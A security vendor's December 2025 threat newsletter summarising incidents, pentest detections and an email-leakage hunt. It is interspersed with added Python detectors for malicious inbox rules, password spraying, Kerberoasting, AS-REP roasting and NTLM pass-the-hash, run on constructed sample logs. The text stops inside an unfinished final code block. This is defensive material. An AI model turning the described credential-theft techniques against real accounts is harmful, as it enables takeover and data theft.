SecurityHQ (https://www.securityhq.com/): SecurityHQ is an industry leader in providing Cyber Security Services including Managed Security Services, Professional Services and Compliance. Feed last updated Mon, 05 Jan 2026 13:14:21 +0000.

Managed Defense Threat Insights: December 2025 Newsletter
https://www.securityhq.com/blog/managed-defense-threat-insights-december-2025-newsletter/
Published Mon, 05 Jan 2026 10:49:53 +0000

The post Managed Defense Threat Insights: December 2025 Newsletter appeared first on SecurityHQ.

Cyber Defense Center

Threat Actors Leveraging Phishing to Compromise User Mailbox and Abuse Inbox Rules

Detection: SecurityHQ’s SOC detected suspicious email activity associated with a user account, including abnormal inbox rule creation and unusual outbound email patterns, through Microsoft Defender for Office 365 alerts and message tracking log analysis.

Description: SOC identified a phishing incident where a user’s credentials were compromised after interacting with a malicious phishing email. Following successful account compromise, the threat actor authenticated to the user’s mailbox and created a malicious inbox rule that automatically forwarded incoming emails to an external RSS feed email address and marked those emails as read, effectively hiding attacker activity and exfiltrating sensitive communications.

Further investigation revealed that the compromised user account was subsequently used to send internal phishing emails to multiple employees within the organization, leveraging the trust associated with a legitimate internal sender. As a result, several additional user accounts were exposed and partially compromised before containment actions were initiated. The Lead Incident Responder reviewed audit logs, inbox rule configurations, sign-in activity, and email telemetry to confirm the scope of compromise and identify affected users.

Immediate response actions included disabling the compromised account, resetting credentials, removing malicious inbox rules, revoking active sessions, and blocking the external forwarding destination. All affected users were notified, and suspicious internal phishing emails were removed from mailboxes using Defender remediation actions.

Lessons Learnt: User phishing remains a highly effective initial access vector for attackers. Inbox rule abuse is a common technique used to maintain persistence and evade detection. Rapid detection, user education, and automated remediation capabilities are critical to minimizing the blast radius of phishing-based compromises.
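As an added example (not code from the newsletter or from SecurityHQ), the following Python flags the inbox-rule pattern described above in Microsoft 365 unified audit log records: a New-InboxRule or Set-InboxRule operation whose parameters forward or redirect mail to a domain outside the organisation, combined with an action that hides the matching mail (MarkAsRead, DeleteMessage, MoveToFolder). The parameter names are those of the Exchange Online inbox-rule cmdlets; the audit records, the internal domain list and the severity thresholds are constructed assumptions.

```python
"""Flag inbox rules that forward mail externally and/or hide it, from Microsoft 365
unified audit log records (Operation New-InboxRule / Set-InboxRule)."""
import re

INTERNAL_DOMAINS = {"example.com"}  # assumption: the organisation's own mail domains
FORWARDING_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")
HIDING_PARAMS = ("MarkAsRead", "DeleteMessage", "MoveToFolder")
ADDR_RE = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")

# Constructed sample records shaped like Exchange Online inbox-rule audit entries
# (Operation, UserId, ClientIP and a Parameters name/value list).
SAMPLE_AUDIT_LOG = [
    {"Operation": "New-InboxRule", "UserId": "alice@example.com", "ClientIP": "203.0.113.10",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "smtp:rss-drop@attacker-example.net"},
                    {"Name": "MarkAsRead", "Value": "True"}]},
    {"Operation": "New-InboxRule", "UserId": "bob@example.com", "ClientIP": "10.0.0.5",
     "Parameters": [{"Name": "Name", "Value": "Invoices"},
                    {"Name": "From", "Value": "billing@example.com"},
                    {"Name": "MoveToFolder", "Value": "Invoices"}]},
    {"Operation": "Set-InboxRule", "UserId": "carol@example.com", "ClientIP": "10.0.0.7",
     "Parameters": [{"Name": "Identity", "Value": "Team updates"},
                    {"Name": "RedirectTo", "Value": "carol.backup@personal-mail-example.org"}]},
    {"Operation": "MailItemsAccessed", "UserId": "dave@example.com", "ClientIP": "10.0.0.9",
     "Parameters": []},
]


def rule_parameters(record):
    """Turn the audit record's Parameters name/value list into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def external_addresses(value):
    """Addresses inside a parameter value whose domain is not one of ours."""
    return [a for a in ADDR_RE.findall(value)
            if a.rsplit("@", 1)[1].lower() not in INTERNAL_DOMAINS]


def assess_rule(record):
    """Return (severity, reasons) for one audit record; severity 'none' if nothing stands out."""
    if record.get("Operation") not in ("New-InboxRule", "Set-InboxRule"):
        return "none", []
    params = rule_parameters(record)
    reasons = []
    for name in FORWARDING_PARAMS:
        ext = external_addresses(params.get(name, ""))
        if ext:
            reasons.append(f"{name} to external recipient(s): {', '.join(ext)}")
    forwards_externally = bool(reasons)
    hides = [name for name in HIDING_PARAMS if name in params]
    if hides:
        reasons.append("hides matching mail via " + ", ".join(hides))
    # Rules created by intruders are often named with a single dot or nothing at all;
    # treat a terse name as a weak supporting signal only.
    label = params.get("Name", params.get("Identity", "x"))
    terse_name = len(label.strip(" .,-_")) == 0
    if terse_name:
        reasons.append("terse or empty rule name")
    if forwards_externally and hides:
        return "high", reasons
    if forwards_externally:
        return "medium", reasons
    if hides and terse_name:
        return "low", reasons
    return "none", []


def find_suspicious_rules(records):
    """All records worth an analyst's attention, in input order."""
    findings = []
    for rec in records:
        severity, reasons = assess_rule(rec)
        if severity != "none":
            findings.append({"user": rec["UserId"], "client_ip": rec["ClientIP"],
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_rules(SAMPLE_AUDIT_LOG):
        print(f["severity"].upper(), f["user"], f["client_ip"], "; ".join(f["reasons"]))
```

Bob's rule only moves internal mail into a normally named folder and is not reported; Alice's rule (external forward plus mark-as-read plus a one-character name) is the high-severity case this incident describes. Pairing the ClientIP with the user's usual sign-in locations is the natural next enrichment step.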

SecurityHQ’s blog published in 2021 is still relevant today; the same tactic was used in this compromise. Refer: Read the blog

Threat Actors Exploiting a Weakness in ASP.NET ViewState Deserialization to Achieve Remote Code Execution

Detection: Client reported possible malicious activity due to the presence of web shells on an IIS-hosted web server.

Description: The client reported the possible presence of a web shell on a web server. The team initiated an investigation using the available IIS server access logs and requested access to the client’s Microsoft Defender console. Based on log analysis, the team confirmed that the initial attack vector was an ASP.NET ViewState deserialization vulnerability. The team identified all malicious web shell payloads and the source IP addresses from which they were deployed. Immediate mitigation steps were recommended, including removing write permissions from the utilities folder. The team also provided all identified Indicators of Compromise (IOCs) to be blocked via the Defender console.

Recommendations: To strengthen the overall security posture, the team recommended applying the patch for the ViewState vulnerability. The team provided all available Indicators of Compromise (hashes) to be blocked in Microsoft Defender and also shared detection criteria for identifying similar instances, recommending the creation of a custom detection rule in Defender.

Lessons Learnt: Organizations should patch zero-day critical vulnerabilities immediately. IIS web servers hosting public applications are attractive targets for attackers. Continuous monitoring and hardening of these assets are essential. Enforcing least-privilege access (e.g., restricting write access to application folders) can significantly reduce attacker capabilities.

A similar incident was featured in our November 2025 Newsletter edition, which highlights the criticality of this vulnerability and the need for immediate patching. Refer: Read the blog

Threat Detection Engineering

Key Detection Engineering Highlights for December

A Global Penetration Testing Season Observed by SecurityHQ (Nov–Dec 2025)

As the year drew to a close, SecurityHQ’s global SOC entered one of its busiest periods. From November through December 2025, organizations across North America, EMEA, APAC, and LATAM scheduled year-end penetration testing and red team exercises to validate their security posture before the new fiscal year.

Early Reconnaissance: Mapping the Identity Landscape

In multiple customer environments, pentesters began quietly. Using LDAP queries, they enumerated Active Directory structures, probing for pre-authentication enabled accounts—a classic foothold for later abuse. SecurityHQ analysts noticed a surge in read-heavy directory queries, far exceeding normal user behavior baselines.

Soon after, the focus shifted to high-value groups. Enumerations of Domain Admins and Enterprise Admins were performed repeatedly, sometimes using native Windows tools, other times via popular AD enumeration frameworks. In mature environments, these queries triggered decoy account interactions, immediately flagging malicious intent.

Parallel to these activities, pentesters conducted discovery scans, sweeping known ports running Windows services that can pave the way for lateral movement. In several cases, testers attempted DNS zone transfer requests, hoping to extract internal naming conventions and asset inventories.

Credential Access: Testing Human Weakness

The activity continued with password spray attacks. Pentesters tested commonly used passwords across large user populations, carefully staying below lockout thresholds.

SecurityHQ’s behavioral analytics detected the low-and-slow authentication failures and correlated them with earlier enumeration activity, forming a complete attack narrative.
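The low-and-slow pattern described above, as an added example that is not part of the newsletter or SecurityHQ's analytics: one source fails against many distinct accounts inside a window while never pushing any single account up to the lockout threshold. The events are constructed to resemble Windows Security events 4625 and 4771; the window, the minimum account count and the lockout threshold are assumptions to tune per domain.

```python
"""Detect low-and-slow password spraying in Windows failed-logon telemetry.

Events are dicts shaped like Security event 4625 (logon failure) or 4771
(Kerberos pre-authentication failure) with TimeCreated, TargetUserName, IpAddress."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=60)
MIN_DISTINCT_USERS = 5   # assumption: distinct accounts from one source that no single user explains
LOCKOUT_THRESHOLD = 5    # assumption: the domain lockout policy a sprayer tries to stay under

BASE = datetime(2025, 12, 1, 9, 0)


def _failure(minute, user, ip, event_id=4625):
    return {"EventID": event_id, "TimeCreated": BASE + timedelta(minutes=minute),
            "TargetUserName": user, "IpAddress": ip}


# Constructed sample: 198.51.100.7 walks eight accounts, one attempt per minute, so each
# account only sees four failures in half an hour; 10.0.0.5 is one user mistyping a password.
SAMPLE_EVENTS = ([_failure(m, f"user{m % 8:02d}", "198.51.100.7") for m in range(32)]
                 + [_failure(m, "alice", "10.0.0.5") for m in (3, 4, 6, 7)])


def detect_password_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS,
                          lockout=LOCKOUT_THRESHOLD):
    """One alert per source IP whose failures in any window span many accounts
    while every account stays below the lockout threshold."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] in (4625, 4771):
            by_ip[e["IpAddress"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        best, start = None, 0
        for end in range(len(evs)):
            # Slide the window start forward until the window fits.
            while evs[end]["TimeCreated"] - evs[start]["TimeCreated"] > window:
                start += 1
            per_user = Counter(e["TargetUserName"] for e in evs[start:end + 1])
            if (len(per_user) >= min_users and max(per_user.values()) < lockout
                    and (best is None or len(per_user) >= best["distinct_accounts"])):
                best = {"source_ip": ip, "distinct_accounts": len(per_user),
                        "max_attempts_per_account": max(per_user.values()),
                        "first_seen": evs[start]["TimeCreated"],
                        "last_seen": evs[end]["TimeCreated"]}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in detect_password_spray(SAMPLE_EVENTS):
        print(a)
```

Per-account failure counting alone never fires here (four failures each is below the lockout), which is exactly why the pivot has to be on the source rather than on the account.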

Privilege Escalation Attempts: Ticket-Based Attacks

As reconnaissance matured, pentesters escalated to Kerberos abuse techniques.
SecurityHQ telemetry showed:

  • Kerberoasting attempts, where service accounts with SPNs were targeted for offline password cracking.
  • AS-REP Roasting, leveraging accounts with disabled pre-authentication to request encrypted authentication material.

These activities stood out due to abnormal Kerberos ticket request patterns.

Logical Phase          | Pentester Activity                       | SecurityHQ Use Case Coverage
Network Discovery      | Discovery scans for open services/ports  | ✔ Covered
Network Discovery      | Zone transfer request                    | ✔ Covered
Directory Recon        | AD/DC enumeration using LDAP queries     | ✔ Covered
Directory Recon        | Excessive domain object queries          | ✔ Covered
Directory Recon        | Default Admin Group enumeration          | ✔ Covered
Target Identification  | Identify pre-auth enabled accounts       | ✔ Covered
Target Identification  | Decoy account enumeration                | ✔ Covered
Credential Access      | AS-REP Roasting                          | ✔ Covered
Credential Access      | Kerberoasting                            | ✔ Covered
Authentication Abuse   | Password spray                           | ✔ Covered

LDAP AS-REP Roasting

Any AD account can suddenly produce a burst of logon events against Active Directory. In most cases the source is a tool or script that rapidly queries directory information, attempting to identify privileged roles, access paths, and high-value accounts. The account's credentials are generally hard-coded or embedded within the tool or script being used.

SecurityHQ’s Threat Detection team has developed logic that uses the LDAP Active Directory Services event log file available under C:\Windows\System32\winevt\Logs.

Rule Name: Authentication: Windows – Possible LDAP AS-REP Roasting

Detection Scope: Monitors LDAP and Kerberos authentication activity across Active Directory domain controllers.

Why it matters: Exposed Kerberos responses can be cracked offline, potentially leading to credential compromise without triggering repeated login failures. Early detection of this behavior helps identify credential access attempts before attackers escalate privileges or move laterally.

MITRE ATT&CK Mapping

TA0006 – Credential Access

T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.

Capabilities that were once exclusive to identity protection tools are now detectable by SecurityHQ through direct analysis of LDAP logs, eliminating the need to rely on EDR or identity telemetry.
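For the two Kerberos techniques listed under Privilege Escalation Attempts and for the AS-REP roasting rule above, the following Python is an added example (not SecurityHQ's rule logic, which works from LDAP logs rather than the events used here). It reads domain-controller Security events 4768 and 4769: a TGT issued with Pre-Authentication Type 0 means the account had pre-authentication disabled, and a service ticket with encryption type 0x17 (RC4-HMAC) is the form a Kerberoaster asks for because it cracks fastest. Event field names follow the Windows Security log; the sample telemetry and the thresholds are constructed.

```python
"""Spot AS-REP roasting and Kerberoasting patterns in domain-controller Security events.

4768 (TGT requested): PreAuthType "0" means the account had pre-authentication disabled,
so the AS-REP carries material that can be cracked offline.
4769 (service ticket requested): TicketEncryptionType 0x17 is RC4-HMAC."""
from collections import defaultdict

RC4_HMAC = "0x17"


def detect_asrep_roasting(events, min_accounts=3):
    """One finding per source IP that obtained no-pre-auth TGTs for several distinct accounts."""
    accounts = defaultdict(set)
    for e in events:
        if e["EventID"] == 4768 and e["PreAuthType"] == "0" and e["Status"] == "0x0":
            accounts[e["IpAddress"]].add(e["TargetUserName"])
    return [{"technique": "AS-REP Roasting", "source_ip": ip, "accounts": sorted(a)}
            for ip, a in accounts.items() if len(a) >= min_accounts]


def detect_kerberoasting(events, min_services=3):
    """One finding per (requesting account, source IP) pulling RC4 service tickets for many SPNs."""
    services = defaultdict(set)
    for e in events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        # krbtgt and computer accounts ($) have long random keys; they are noise here.
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue
        services[(e["TargetUserName"], e["IpAddress"])].add(svc)
    return [{"technique": "Kerberoasting", "account": acct, "source_ip": ip, "services": sorted(s)}
            for (acct, ip), s in services.items() if len(s) >= min_services]


def _tgt(user, ip, preauth, status="0x0"):
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "PreAuthType": preauth, "Status": status}


def _tgs(user, ip, service, etype):
    return {"EventID": 4769, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": service, "TicketEncryptionType": etype}


# Constructed sample telemetry; 10.0.0.42 is a hypothetical workstation doing the roasting.
SAMPLE_EVENTS = [
    _tgt("svc-backup", "10.0.0.42", "0"),
    _tgt("svc-legacy", "10.0.0.42", "0"),
    _tgt("jdoe", "10.0.0.42", "0"),
    _tgt("alice", "10.0.0.8", "2"),                    # normal logon: PA-ENC-TIMESTAMP pre-auth
    _tgt("svc-old", "10.0.0.8", "0", status="0x6"),    # unknown principal, no AS-REP issued
    _tgs("mallory", "10.0.0.42", "svc-sql", RC4_HMAC),
    _tgs("mallory", "10.0.0.42", "svc-web", RC4_HMAC),
    _tgs("mallory", "10.0.0.42", "svc-report", RC4_HMAC),
    _tgs("mallory", "10.0.0.42", "krbtgt", RC4_HMAC),
    _tgs("alice", "10.0.0.8", "FILESRV01$", "0x12"),   # AES256 ticket for a computer service
]


def run(events=SAMPLE_EVENTS):
    return detect_asrep_roasting(events) + detect_kerberoasting(events)


if __name__ == "__main__":
    for finding in run():
        print(finding)
```

Both detections key on the requesting source, which is what makes them visible without a single failed logon: the tickets are issued successfully, and only the volume and the ticket properties give the activity away.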


Threat Management

SecurityHQ’s Threat Management Team manages various endpoint security, cloud security and network security solutions for customers. The following section highlights some key security insights.

Alert: Multiple Suspicious Script and Reconnaissance Activities Detected (INC #1460383)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telemetry on December 8th, 2025, indicating multiple suspicious activities. The alert covered abnormal script execution, potential persistence mechanisms, defense evasion techniques, and domain reconnaissance activity originating from a single internal endpoint. The activity was classified as suspicious due to the combination of tools and techniques commonly associated with malicious actor behavior.

Investigation: On December 8th, 2025, Microsoft Defender for Endpoint detected a sequence of suspicious actions initiated from a remote interactive session originating from an internal source IP. The activity involved the use of built-in Windows utilities and scripting engines that are commonly abused by threat actors. Notably, the NLTest utility was executed with the /domain_trusts parameter to enumerate domain trust relationships, a behavior indicative of Active Directory reconnaissance and often observed during ransomware operations or lateral movement preparation.

Shortly thereafter, additional suspicious behavior was identified, including the abuse of Rundll32 to execute JavaScript, a known living-off-the-land technique used to evade security controls, and wscript execution modifying registry keys related to proxy configuration, which could enable interception or redirection of web traffic. PowerShell was also observed as part of the activity chain, with the associated file hash reviewed through threat intelligence sources. The combination of script-based execution, system enumeration, and potential proxy manipulation strongly suggests intentional reconnaissance and defense evasion, rather than legitimate administrative activity.

Response Action taken:

  • SOC raised a major incident and informed the customer over a call.
  • The Threat Management Team blocked the identified IOCs and updated the incident.
  • The malicious process was successfully blocked and terminated by Microsoft Defender.
  • No further suspicious activity has been observed. A full antivirus scan has been performed across the entire host to ensure no residual malware components remain active.

Alert: MDE: Pass the Hash followed by brute force was detected on Windows server. (INC #1471047)

Detection: An incident was detected using Microsoft Defender for Endpoint (MDE) alerts and telemetry on December 16th, 2025, indicating suspicious lateral movement activity and remote command execution on a device. The alert identified ‘SuspRemoteCmdCommand’ malware associated with WMI process execution originating from an external IP address.

Investigation: On December 16th, 2025, security monitoring identified a successful network logon (Event ID 4624) using an anonymous authentication context over NTLM, originating from an internal source IP and targeting domain controller infrastructure. The authentication leveraged NTLM V1 with a key length of zero via the NtLmSsp logon process, which is highly anomalous and consistent with Pass-the-Hash–style activity. During the same timeframe, multiple indicators of credential abuse were observed, including failed NTLM authentication attempts for privileged accounts, enumeration of a large number of user accounts consistent with a dictionary-style attack, and repeated access attempts to administrative and IPC shares. Additional LDAP query activity against directory services further suggested reconnaissance behavior focused on domain discovery.

Subsequent investigation revealed a broader pattern of post-authentication activity, including the creation of new processes associated with agent-style executables, the addition of multiple network share objects, and repeated access to SYSVOL, NETLOGON, and IPC$ shares from the same source. Follow-on actions included the creation and password reset of new computer accounts within the domain, successful network logons tied to the same source IP, and directory read access across multiple domain controller shares, all indicative of lateral movement and persistence preparation. In parallel, sensitive recovery material was accessed via directory and cloud interfaces, increasing the overall risk severity. Taken together, the activity strongly aligns with credential misuse, lateral movement, and domain-level reconnaissance, rather than legitimate administrative operations.

Response Action taken:

  • SOC raised a major incident and informed the customer over a call.
  • The Threat Management Team blocked the identified IOCs and updated the incident.
  • Running malicious processes were terminated and residues cleared by the Threat Management analyst.
  • No further suspicious activity has been observed. A full antivirus scan has been performed across the entire host to ensure no residual malware components remain active.
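The NTLM anomalies that opened this investigation (a network logon using NTLM V1, a zero key length, an anonymous authentication context, targeting a domain controller) can be scored directly from Security event 4624. The following Python is an added example, not SecurityHQ's detection content; the field names are those of event 4624, while the domain controller list, the sample events and the score weights are constructed assumptions.

```python
"""Score network logons (Security event 4624, LogonType 3) for the NTLM anomalies
described above: NTLMv1, zero session-key length, anonymous context, DC target."""

DOMAIN_CONTROLLERS = {"DC01", "DC02"}   # assumption: hostnames of the logging domain controllers


def assess_network_logon(e):
    """Return (score, reasons) for one 4624 event; 0 for anything that is not an NTLM network logon.
    KeyLength 0 is normal for Kerberos logons, so the NTLM gate below matters."""
    reasons = []
    if (e.get("EventID") != 4624 or str(e.get("LogonType")) != "3"
            or e.get("AuthenticationPackageName") != "NTLM"):
        return 0, reasons
    score = 0
    if e.get("LmPackageName") == "NTLM V1":
        score += 2
        reasons.append("NTLMv1 accepted (legacy protocol)")
    if str(e.get("KeyLength")) == "0":
        score += 2
        reasons.append("session key length 0")
    if e.get("TargetUserName", "").upper() == "ANONYMOUS LOGON":
        score += 2
        reasons.append("anonymous authentication context")
    if e.get("Computer") in DOMAIN_CONTROLLERS:
        score += 1
        reasons.append("target is a domain controller")
    return score, reasons


def find_pth_candidates(events, min_score=4):
    """Events whose combined anomalies reach the threshold, for analyst triage."""
    out = []
    for e in events:
        score, reasons = assess_network_logon(e)
        if score >= min_score:
            out.append({"computer": e["Computer"], "source_ip": e["IpAddress"],
                        "user": e["TargetUserName"], "score": score, "reasons": reasons})
    return out


def _logon(computer, user, ip, package, lm="-", key_length=128):
    return {"EventID": 4624, "LogonType": 3, "Computer": computer, "TargetUserName": user,
            "IpAddress": ip, "AuthenticationPackageName": package, "LmPackageName": lm,
            "KeyLength": key_length}


# Constructed sample events.
SAMPLE_EVENTS = [
    _logon("DC01", "ANONYMOUS LOGON", "10.0.5.23", "NTLM", lm="NTLM V1", key_length=0),
    _logon("FILESRV01", "bob", "10.0.7.12", "NTLM", lm="NTLM V2"),
    _logon("DC01", "alice", "10.0.7.15", "Kerberos", key_length=0),
    _logon("DC02", "svc-scan", "10.0.9.2", "NTLM", lm="NTLM V2", key_length=0),
]


if __name__ == "__main__":
    for c in find_pth_candidates(SAMPLE_EVENTS):
        print(c["computer"], c["source_ip"], c["user"], c["score"], "; ".join(c["reasons"]))
```

The scanner account on DC02 scores 3 and stays below the threshold: a zero key length on its own is common enough that it needs a second anomaly before it is worth paging anyone. The follow-on indicators in this incident (4625 failures for privileged accounts, new computer accounts, share access from the same IP) are the natural correlation keys on source_ip.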

Threat Hunting

SecurityHQ’s Threat Hunting team conducted hunts focused on general email activity seen in customer environments. The following section highlights some of the key findings and recommendations that were communicated to affected customers.

Context: Suspicious and abnormal email communication patterns were observed across the organizations, indicating a potential risk of data exfiltration, unauthorized information disclosure, or insider misuse. These behaviors include frequent communication with competitor domains, outbound emails sent outside business hours, attachments sent to free or personal email services, and anomalous email activity linked to departing employee accounts.

The objective of these hypotheses was to proactively detect, investigate, and respond to email-based data leakage risks, ensuring sensitive business information is not transferred outside the enterprise without authorization and strengthening the overall email security posture.

Notable Observations: Across the environment, the threat hunt identified multiple high-risk email behaviors. Key findings are summarized below: 

Extensive Communication with Competitor Domains

A significant volume of email communication was observed between internal users and competitor domains. Lists of competitor domains were proactively shared by a few organisations with mature security programs.

Key Observations:

  • On average, 1-2 percent of total emails involved competitor domains.
  • Top competitor domains included key competitors for the company.
  • Repeated high-frequency communications from a small subset of users. Subject lines referenced agreements, contracts, approvals, financial statements, tax and legal matters, increasing data sensitivity concerns.

Associated Risk: These patterns may indicate unauthorized sharing of confidential business information, competitive intelligence leakage, or misuse of corporate email channels. This highlights the importance of adding competitor domains to a watchlist to detect unapproved or intentional data leakage.

Out-of-Business Hours External Email Activity

Outbound emails sent between 7 PM and 7 AM showed elevated volumes toward external recipients.

Key Observations:

  • Multiple users sent hundreds of emails to external recipients during non-business hours.
  • Several emails were linked to payment-related or financial subjects.
  • Activity occurred during low-visibility periods, reducing detection likelihood.

Associated Risks: Email activity during off-hours increases the risk of covert data exfiltration, especially when financial or sensitive business information is involved.

Email Activity from Departing / Disabled Accounts

Email activity was analyzed for users whose accounts were disabled in the last 30 days.

Key Observations:

  • No clear evidence of malicious behavior immediately prior to account disablement was observed by the SecurityHQ Team.
  • From past experience, leavers typically tend to forward documents as email attachments to their personal email accounts.

Associated Risk: Although not conclusively malicious, data leakage risk increases during employee offboarding, especially when legal or financial documents are involved.

Emails Sent to Free & Personal External Email Domains

Significant email traffic was observed toward free external email providers in organization where these domains are not explicitly blocked.

Key Observations:

  • On average, 10 percent of total email trails involved free external domains.
  • 70 percent of total emails sent appeared to be sent to potential personal email accounts.
  • All flagged emails included attachments.

Associated Risk: Sending attachments to personal email accounts is a well-known insider threat and data exfiltration technique, presenting one of the highest leakage risks identified in this hunt.

External Email Auto-Forwarding Indicators

While external auto-forwarding appears largely restricted, related behaviors were still noted.

Key Observations:

  • No widespread misconfiguration allowing automatic forwarding was identified.
  • Users were observed manually forwarding emails to external accounts.
  • Lack of user awareness regarding the risks of external forwarding.

Associated Risk: Manual forwarding can bypass technical controls and enables silent, persistent data exfiltration if not properly monitored.

Hypothesis Status:

  • The threat hunt identified multiple email communication behaviors that increase the risk of data exfiltration, although no confirmed malicious breach was detected.
  • High-volume communication with competitor domains, combined with sensitive subject lines, represents a moderate to high data leakage risk.
  • Out-of-business-hours emailing and attachment sharing to free or personal domains significantly elevates insider threat exposure.
  • Departing employee accounts did not show overt malicious intent but still warrant validation due to the nature of shared content.
  • Overall, the findings highlight control gaps, monitoring blind spots, and awareness issues that could be exploited for unauthorized data disclosure if left unaddressed.
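The four hunts above (competitor domains, out-of-hours external mail, free-mail providers with attachments, and departing accounts) can be run as one pass over message-trace data. The following Python is an added example and not SecurityHQ's hunt tooling; the competitor list, the disabled-account list, the internal domain, the free-mail provider set and the ten sample messages are constructed, and the 7 PM to 7 AM window is the one stated in the hunt.

```python
"""Score outbound mail for the exfiltration patterns hunted above, over message-trace style
records (sender, recipient, time, subject, attachment count)."""
import re
from collections import Counter
from datetime import datetime

INTERNAL_DOMAIN = "example.com"                     # assumption: the customer's own domain
COMPETITOR_DOMAINS = {"competitor-example.net"}      # assumption: list supplied by the customer
FREEMAIL_DOMAINS = {"gmail.com", "outlook.com", "yahoo.com", "hotmail.com"}
DISABLED_ACCOUNTS = {"dave@example.com"}             # assumption: leavers disabled in the last 30 days
OFF_HOURS_START, OFF_HOURS_END = 19, 7               # 7 PM to 7 AM, per the hunt
SENSITIVE_SUBJECT = re.compile(r"\b(contract|agreement|approval|financial|tax|legal|payment|invoice)\b", re.I)


def _msg(sender, recipient, when, subject, attachments):
    return {"sender": sender, "recipient": recipient, "time": datetime.fromisoformat(when),
            "subject": subject, "attachments": attachments}


# Constructed sample trace for one day.
SAMPLE_TRACE = [
    _msg("alice@example.com", "partner@competitor-example.net", "2025-12-02T10:00", "Contract approval", 1),
    _msg("alice@example.com", "partner@competitor-example.net", "2025-12-02T11:00", "Re: agreement", 0),
    _msg("bob@example.com", "bob.home@gmail.com", "2025-12-02T21:30", "Tax docs", 2),
    _msg("carol@example.com", "team@example.com", "2025-12-02T09:00", "Standup notes", 0),
    _msg("dave@example.com", "dave.personal@outlook.com", "2025-12-02T18:00", "Handover files", 1),
    _msg("erin@example.com", "vendor@vendor-example.org", "2025-12-02T22:15", "Payment schedule", 0),
    _msg("frank@example.com", "hr@example.com", "2025-12-02T14:00", "Leave request", 0),
    _msg("bob@example.com", "supplier@vendor-example.org", "2025-12-02T15:00", "PO 4471", 1),
    _msg("grace@example.com", "grace@example.com", "2025-12-02T16:00", "Note to self", 0),
    _msg("heidi@example.com", "friend@yahoo.com", "2025-12-02T07:30", "Photos", 0),
]


def domain(addr):
    return addr.rsplit("@", 1)[1].lower()


def is_external(m):
    return domain(m["recipient"]) != INTERNAL_DOMAIN


def is_off_hours(m):
    hour = m["time"].hour
    return hour >= OFF_HOURS_START or hour < OFF_HOURS_END


def hunt(trace):
    """Summarise the four hunt hypotheses over a message trace."""
    total = len(trace)
    competitor = [m for m in trace if domain(m["recipient"]) in COMPETITOR_DOMAINS]
    off_hours_ext = [m for m in trace if is_external(m) and is_off_hours(m)]
    freemail = [m for m in trace if domain(m["recipient"]) in FREEMAIL_DOMAINS]
    freemail_attach = [m for m in freemail if m["attachments"] > 0]
    leavers = [m for m in trace if m["sender"] in DISABLED_ACCOUNTS and is_external(m)]
    return {
        "competitor_pct": round(100 * len(competitor) / total, 1),
        "competitor_sensitive_subjects": sum(1 for m in competitor if SENSITIVE_SUBJECT.search(m["subject"])),
        "competitor_top_senders": Counter(m["sender"] for m in competitor).most_common(3),
        "off_hours_external_senders": sorted({m["sender"] for m in off_hours_ext}),
        "freemail_pct": round(100 * len(freemail) / total, 1),
        "freemail_with_attachments_pct": round(100 * len(freemail_attach) / max(len(freemail), 1), 1),
        "leaver_external_with_attachments": [(m["sender"], m["recipient"])
                                             for m in leavers if m["attachments"] > 0],
    }


if __name__ == "__main__":
    for key, value in hunt(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```

The same functions serve as the starting point for the recommendations that follow: the free-mail-with-attachment and leaver checks are what a DLP or transport rule would block, and the off-hours and competitor checks are what an alerting rule would page on.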

Recommendations: Based on the observed email threat landscape, the following actions are recommended:

  • Enforce DLP policies to detect and block sensitive financial, legal, and confidential content in outbound emails.
  • Block or quarantine attachments sent to free and personal external email domains.
  • Enable automatic encryption and mandatory classification for sensitive outbound email attachments.
  • Monitor and alert on outbound emails sent to external recipients outside business hours.
  • Trigger alerts when users send an unusually high number of attachments to new external recipients.
  • Continuously monitor and review communications with competitor domains.
  • Perform enhanced email activity reviews for users during employee offboarding periods.
  • Restrict external email capabilities for departing users where business-justified.
  • Educate users on risks associated with forwarding corporate emails to personal accounts.
  • Periodically audit external email forwarding behaviors and policy exceptions.

Incident Response Success Story

Incident Story: X (Formerly Known as Twitter) Account Compromise Linked to a Corporate Domain

SecurityHQ’s Incident Response (IR) team was engaged following a suspected account takeover involving Apple IDs, social media accounts, and mobile devices. The attack leveraged leaked personal data, phishing, and session hijacking techniques to bypass MFA and gain persistent access.

The incident began when an attacker obtained leaked personal data from an external breach. Using this information, the attacker crafted a highly targeted phishing email impersonating Apple security communications.

The phishing email prompted the victim to consent to Apple account access, unknowingly authorizing a malicious OAuth session. This allowed the attacker to bypass MFA via session hijacking.

With valid session access, the attacker logged in using the leaked credentials and began account persistence actions:

  • Recovery email was changed on the X (Twitter) account
  • Mobile number was updated on Telegram
  • Old tweets were deleted.

Investigation revealed that a single Session ID was accessed from multiple geographically disparate locations simultaneously. This anomaly provides definitive evidence of session hijacking, indicating that the attacker stole the valid session token and replayed it from remote infrastructure to bypass Multi-Factor Authentication (MFA).

The user’s personal Apple ID appeared in multiple breach datasets, and both personal and corporate accounts were active on the same device. This strongly supports a session hijacking pathway originating from the compromised personal account, enabling access to the corporate session without requiring the corporate password.

No direct evidence of corporate credential leakage was found on the dark web, and no further lateral movement was identified.
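The session-replay indicator that settled this case (one session identifier active from two countries at the same time) is straightforward to check once activity logs carry a session ID and a geo-IP country. The following Python is an added example, not the IR team's tooling; the session records, countries and IP addresses are constructed, and the one-hour window is an assumption about what counts as impossible travel for a single session.

```python
"""Detect one session token used from multiple countries within a short window,
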